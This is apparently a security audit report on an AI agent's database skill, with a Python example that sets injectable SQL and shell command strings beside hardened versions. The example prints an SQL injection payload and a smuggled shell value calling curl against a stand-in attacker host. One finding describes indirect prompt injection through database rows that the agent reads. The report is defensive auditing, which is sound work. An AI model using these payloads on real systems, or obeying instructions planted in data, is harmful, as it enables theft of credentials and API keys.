database-operation
Fail
Audited by Gen Agent Trust Hub on Apr 9, 2026
Risk Level: HIGH
COMMAND_EXECUTION, CREDENTIALS_UNSAFE, DATA_EXFILTRATION, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill instructs the agent to use the execute_command tool to run shell-based database clients such as sqlite3 and psql. Because both the shell command line and the SQL text are assembled as strings, the pattern is susceptible to shell command injection and to SQL injection whenever queries or connection parameters are built from untrusted user input.
- [CREDENTIALS_UNSAFE]: The instructions require the agent to extract cleartext passwords from system prompts and place them directly in shell commands (e.g., a PGPASSWORD=... prefix). When such a string is handed to a shell, the password becomes part of a process command line visible in process listings and may also be written to shell history files.
- [DATA_EXFILTRATION]: By granting access to tables such as site (containing cookies, apikey, and tokens) and user, the skill exposes sensitive application secrets. Although safety rules advise against displaying these to the user, the availability of execute_command allows an attacker to exfiltrate this data via network utilities like curl or wget.
- [REMOTE_CODE_EXECUTION]: The troubleshooting section suggests a fallback mechanism using python3 -c to execute arbitrary Python code for database interaction. This provides a direct vector for running unvalidated code on the host system.
- [PROMPT_INJECTION]: The skill processes data from tables like 'message' and 'downloadhistory' which could contain untrusted content. This creates an indirect prompt injection surface where malicious instructions stored in the database could influence the agent's behavior during result interpretation.
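The two patterns behind the COMMAND_EXECUTION and CREDENTIALS_UNSAFE findings, each beside a hardened form, as an added example that is not code from the audited skill. It runs offline against a constructed SQLite file with a `site` table shaped like the one the skill exposes; the table contents, the attacker payloads, the `attacker.invalid` host and the psql database name are assumptions made for the demonstration, and the psql part only builds the command line, it does not execute it.

```python
"""Added example: string-built SQL and command lines vs. hardened forms."""
import os
import sqlite3
import tempfile


def make_sample_db():
    """Constructed sample: a 'site' table like the one the audit names."""
    path = os.path.join(tempfile.mkdtemp(), "app.db")
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE site (domain TEXT, apikey TEXT)")
    conn.executemany(
        "INSERT INTO site VALUES (?, ?)",
        [("example.com", "key-example"), ("internal.test", "key-internal")],
    )
    conn.commit()
    conn.close()
    return path


# --- COMMAND_EXECUTION, SQL side: query text assembled from untrusted input ---
def lookup_apikey_unsafe(db_path, domain):
    # The flagged pattern: `domain` is spliced into the SQL, so quote characters
    # and OR clauses in it are parsed as SQL and can dump the whole table.
    sql = f"SELECT apikey FROM site WHERE domain = '{domain}'"
    with sqlite3.connect(db_path) as conn:
        return [row[0] for row in conn.execute(sql)]


def lookup_apikey_safe(db_path, domain):
    # Bound parameter: the input is passed as data and never parsed as SQL.
    with sqlite3.connect(db_path) as conn:
        rows = conn.execute("SELECT apikey FROM site WHERE domain = ?", (domain,))
        return [row[0] for row in rows]


# --- COMMAND_EXECUTION, shell side: the same input dropped into a command line ---
def shell_command_unsafe(db_path, domain):
    # Handed to `sh -c`, this string is parsed by the shell: a quote, ';' or
    # $(...) inside `domain` is executed, which is how an agent can be steered
    # into running curl/wget (the DATA_EXFILTRATION path above).
    return f"sqlite3 {db_path} \"SELECT apikey FROM site WHERE domain = '{domain}'\""


def shell_argv_safe(db_path, domain):
    # argv list for subprocess.run(argv) without a shell: no shell parser ever
    # sees `domain`. SQL quoting is still unsolved here, which is why the
    # library call with a bound parameter above is the preferred form.
    return ["sqlite3", "-readonly", db_path, "SELECT apikey FROM site WHERE domain = ?"], domain


# --- CREDENTIALS_UNSAFE: password on the command line vs. in the environment ---
def psql_command_unsafe(password, dbname):
    # The flagged pattern: when this string goes to `sh -c`, the password is part
    # of the shell process's argv (visible to `ps`) and may land in shell history.
    return f"PGPASSWORD={password} psql -h localhost -d {dbname} -c 'SELECT count(*) FROM \"user\"'"


def psql_invocation_safe(password, dbname):
    # argv carries no secret; the password travels only in the child's environment.
    # (Still readable from /proc/<pid>/environ by the same uid, so a .pgpass file
    # or peer/certificate auth is better where the deployment allows it.)
    argv = ["psql", "-h", "localhost", "-d", dbname, "-c", 'SELECT count(*) FROM "user"']
    env = dict(os.environ, PGPASSWORD=password)
    return argv, env


if __name__ == "__main__":
    db = make_sample_db()
    payload = "x' OR '1'='1"
    print("unsafe:", lookup_apikey_unsafe(db, payload))   # both API keys leak
    print("safe:  ", lookup_apikey_safe(db, payload))     # no row matches
    print(shell_command_unsafe(db, "x'; $(curl http://attacker.invalid)"))
    print(psql_command_unsafe("hunter2", "appdb"))
```

Run as a script it prints the table dump produced by the injected `OR '1'='1'`, the empty result from the bound-parameter query, and the two command lines so the difference in what reaches the shell is visible. The argv/env split does not by itself prevent SQL injection through the sqlite3 CLI; it removes the shell from the path, which is the part of the finding that turns a query into code execution.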
Recommendations
- AI detected serious security threats
Audit Metadata